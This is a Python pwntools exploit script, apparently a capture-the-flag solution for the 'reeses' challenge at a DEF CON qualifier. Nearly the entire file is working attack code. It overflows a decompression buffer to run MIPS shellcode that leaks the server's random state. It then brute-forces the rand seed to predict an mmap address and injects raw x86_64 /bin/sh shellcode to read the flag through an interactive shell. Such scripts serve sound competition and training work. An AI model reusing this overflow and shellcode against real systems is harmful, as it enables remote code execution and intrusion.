#!/usr/bin/env python2
from pwn import *
import struct
import binascii
import time
from reeses_rand import R
import random
local = False
host = ''
port = 0

''' MIPS syscalls (-4000)
    1:  "exit",
    3:  "read",
    4:  "write",
    5:  "rand",
    11: "time",
    12: "malloc",
'''

context(os='linux', arch='x86_64')

if local:
    t = process('./reeses', aslr=True)

else:
    host = 'reeses_fc849330ede1f497195bad5213deaebc.quals.shallweplayaga.me'
    port = 3456

    t = remote(host, port)

start_time = int(time.time())
def SendFile(filename):
    with open(filename, 'rb') as f:
        data = f.read()

    length = len(data)

    print 'File Length = %d' % length

    t.send( struct.pack('<l', length) + data)

SendFile('sample1')
print t.recvline()# <<RUNNING>>

uncomfile = open('/tmp/resees_uncomp.txt','w')

# MIPS doesn't have any kind of ASLR so our uncompressed buffer should
# always start at the exact same address.
uncompress_addr = 0x0040A0B8

mipsshellcode = open('mips_sc.bin').read()

uncomfile.write(mipsshellcode + 'A'*(0x25EDC-len(mipsshellcode)) + struct.pack('<I', uncompress_addr))
uncomfile.close()

#Lazy. Assumes custom compiled lzss in cwd
os.system('./lzss e /tmp/resees_uncomp.txt /tmp/resees_comp.bin')

comp = open('/tmp/resees_comp.bin').read()

#Send the buffer to decompress, executes mips_sc.asm
t.send(struct.pack('<BI',1,len(comp))+comp)

#Recv the leakd data
buf = t.recvn(68)
data = struct.unpack("<17L", buf)
remote_time = data[0]


#/bin/sh shellcode
x64_sc = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05'

server_rand = data[1:]

found = False

#Don't try values more than once
tried = set()
r_obj = R()
while time.time()-start_time < 45:
    #guess a random value for the printf >> 12
    addr = random.randint(0xf0000000,0xffffffff)
    while addr in tried:
        addr = random.randint(0xf0000000,0xffffffff)
    tried.add(addr)
    
    s = 0x50000000 ^ addr

    r_obj.srand(s)
    found = True
    for j in range(4):
        if r_obj.get() != server_rand[j]:
            found = False
            break
    if found:
        print 'FOUND ', hex(s)
        break

if not found:
    sys.exit(2)

#Reinitialize rand object
r_obj = R()
r_obj.srand(s)
r_test = [r_obj.get() for i in range(16)]

#compute the address passed to mmap
sc_addr = (r_obj.get()<<12) | 0x400000000000


print 'malloc_addr = ', hex(addr)
#Send the shellcode length and address
buf = struct.pack("<LQ", len(x64_sc), sc_addr)
#And the shellcode
t.write(buf + x64_sc)

#then send a command to /bin/sh
t.write('cat flag\n')
t.interactive()
sys.exit(0)
